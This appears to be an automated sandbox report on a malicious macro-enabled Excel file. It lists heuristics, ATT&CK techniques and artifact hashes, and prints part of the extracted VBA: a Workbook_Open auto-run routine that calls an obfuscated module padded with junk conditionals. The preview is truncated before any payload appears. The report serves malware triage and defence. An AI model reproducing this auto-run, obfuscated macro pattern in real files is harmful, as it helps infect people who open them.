MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a malicious Excel document containing a Workbook_Open macro. This macro is designed to execute obfuscated VBA code, which likely attempts to download and execute a second-stage payload. The presence of a Workbook_Open macro and the use of CreateObject are strong indicators of malicious intent, commonly seen in macro-based malware delivery.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 26392 bytes |
SHA-256: 23e1d8f362256b1a45ddad84d95874327df344999e42d3cde8e4866935401712 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
JFoCUnukWicxrukTg.XwNyDABQTklaWyUqBYdR
If "bVZAtT" = "czeccgHZqfvKFImgaojDpBcFwzXgWBXMFkYBmqIFSxHovrT" Then
Dim UeuulRqeaXZgcIbCoHi As Byte
ElseIf "FUkkujgekrtoJEgCBbGlvOGxeMKfwruTgNmykuALFmFmhjPbvGZbh" = "VmqOnGhZAhtwaHwShSHavgIJTQvwikqSSlKav" Then
Dim kxnTlFFMqHbTINnRBlpeguWLkrQrado
End If
If "wVWxVUG" = "KbDxdJTdZWCBRAVvPpabjuoNlMSfxlQRwv" Then
Dim bNajRNsHRuoZMoaZHH As Byte
ElseIf "vsXQmqLQqnfnFlEWYHVfYMjbcuYLAeEXdJWEXLakYAXEcdoDVqPSEcijI" = "vnrRzQLiHJwOzyNgkGXpezzGVqKPmSBanvbXjTYkLWUTsoVrBlUV" Then
Dim LtewolwJFvwoIWbEWqxQindIefOgUSOAyfPtRfjx
End If
If "XOfQZg" = "LVNRULnEnXQVRIXPpmhwqdHimrGAsTINjyUsTCyDMtsrcwNaZIZ" Then
Dim sidqiOeedEnLTPDlTo As Byte
ElseIf "ewmodjwlQFqefakuPeGHmeoXVyZiYbYKtmvLmDFtuwyYoyZMaZAZfLCAHO" = "TfKNNohfktfYHMZMNpgPjWZMIybzfikuEYkaigjJrIOgh" Then
Dim BSnASxMUrexFyFONhACIkUibzdhFXYbHteGf
End If
If "nzMkXaNt" = "mUkaVvKHMXwhjLApQHwTDpLTzjaioRkJHpoet" Then
Dim GkcOTvWiZvbyWUQetpxIRblUcT As Byte
ElseIf "ummZuXWwJXUFjtplanzjRxUfNzrVbfyHlAAjvzBEcaKtJ" = "oFDTgByVsBxRHMufAUdYNTjsGpalvGrmbWZunCvdAmtzDRo" Then
Dim mHYbGhUwVWKMqaMalKKqknAsyYzYaakooBoeWfkFGZE
End If
If "XcpFDnLH" = "otbDzHgdhhwVulWYomhDGZEkLjcPITwkPTvvNyoXq" Then
Dim BDYKEJlGRQRFIAP As Byte
ElseIf "orsQeQVNkLGbqaLqxKNFVgZGZqJrDffGSgGWGYsZfp" = "nyxhvfGZTvuutHRlqoHeKFgzIJTokZRnZ" Then
Dim gtbIsudldMkLYnzFUhERBfiSyYmLRotdH
End If
If "UNOpcxte" = "sgswokWUjQsNWXAKIKTIRToSGEDZkPrjLnIzpVKoPriYBQkx" Then
Dim MDgSekMZrZpjgwkTYIBiOBVn As Byte
ElseIf "AfsalPRqTGMgiZFaajIPgaHSGOAsOCiLit" = "RyrmobIzPakElyDbHfsGGZXaTWPZbRYAxoHGinvgHgKhiCdBpnu" Then
Dim DTcmraRTRMiXyCjGwrwsTjMyaPqsQtNjoWVhVBPfRUeUYIMeywhKsvaTG
End If
If "dMcjZCYyz" = "jchBkubQbzFraRDMtUMCqtvBasomvrSGWZZjxwLmjbTbNPCvZXfh" Then
Dim LwIqgfasFoVjgzVBrTOwIZ As Byte
ElseIf "TOZUnLptMXLkuaRiDSVThuGkvOtBEGJjZmctRMrPCMbxXvFvkJQvaosYIo" = "YZSnpGOcLHxYQqbGQUTJNzJyRuqNIkuElcnRwP" Then
Dim XViujxyMsZUUYXEybZQTVuPBUbNsmoDJJBxxaSPMzFCRtoMWzmBOBct
End If
If "cFhaHj" = "FZEWKKWZHXJJEUQsyHfPqsAmoHgHUrtrIctgyuidpxsOrExIdkHZvstNY" Then
Dim RhCdPEPeRBbajtDZBat As Byte
ElseIf "zlujKXdkkTwPjgIgNfzZsdkaDViuqEztRzOnWxsGlUeKVlstb" = "NpuBAAVAUgoojtgTDxjSUKPmtoYyZERdp" Then
Dim TdOFrRzsmBRERCayrSnJbGCaIILcWbQOLzQPROLgkZi
End If
If "IyhcmxAim" = "eUNMbnwjFWVKlDtRlLgdGHYCXucafZeWtdkrmDo" Then
Dim dRcbNDXWuoLAmTFgXvLo As Byte
ElseIf "gLWDfszRITCeiWCLdfLyAXhlUYsCoxMvbPHSuYvVEFObmgSPR" = "tCrkMoJekjHzxdKGGDTPkQEkptuIFzoGcl" Then
Dim uuVLOaynKpoVHcDVfczAgcxGuStAYlvAXLjQkvpsRw
End If
If "GPwTmSFkT" = "LGcESxOQvhxPYtnyvtnkkmHjkViKbgavoRjtvHQSVfuK" Then
Dim ThiVJVrZRzjYzsU As Byte
ElseIf "wOEpPGBaGJtDocUOFswPCnMBFpBdpiLuCmUERqfDRHbLPRCxwkefCc" = "RIBDjZFXkXyyBCHQxPNsyvLBlomDhFEf" Then
Dim rZULCNGFytWDMQQAqgmPSJeVwASunBqfTTHbhvNkIIuEZHoUXmNASpM
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "JFoCUnukWicxrukTg"
Sub XwNyDABQTklaWyUqBYdR()
On Error Resume Next
If "rXeoxDD" = "DOGckxSlFzfrBajpzfDtxaHbyEMJMIKMwFSZeYCueVSQJWYZH" Then
Dim ifItJFdGedglIZwpS As Byte
ElseIf "uvHKKacJPcHrScfmBddBTmzpTzuWJVw" = "VbqbdSxXEfkudVOMBAyHvTnzHwSrKgGAtgmQbA" Then
Dim CUEGYVisWTEnsVKOACnqUgzGMYYjAwjykBydCouSROZymXnl
End If
If "pffjdlg" = "VUxtAwysZkFDrWhLMHUZFHBTpknuURzVyVcIEutVSVANhTwOIUTbI" Then
Dim LaOTeEQJEYHkjEWuYGROyHjGnm As Byte
ElseIf "VnYlAyXNmuOpaqcMNxscxPaUjNBNJEr" = "IfrjclSYJMWRcfjfblmtlNLoGNDBmwKDiCGJiHAbuZj" Then
Dim PaxxpAhacWKFuUDcOhQlNCTjZZZxTlLyMevO
End If
If "JQOBEV" = "igXwLpfeltdnWNHNXPakHqLMtQZoTyTPhrUmL" Then
Dim dN
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 71680 bytes |
SHA-256: 1fd6609a7f3ff3a484e05253cf22361396619bccc1407de7fad90be90763f91d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.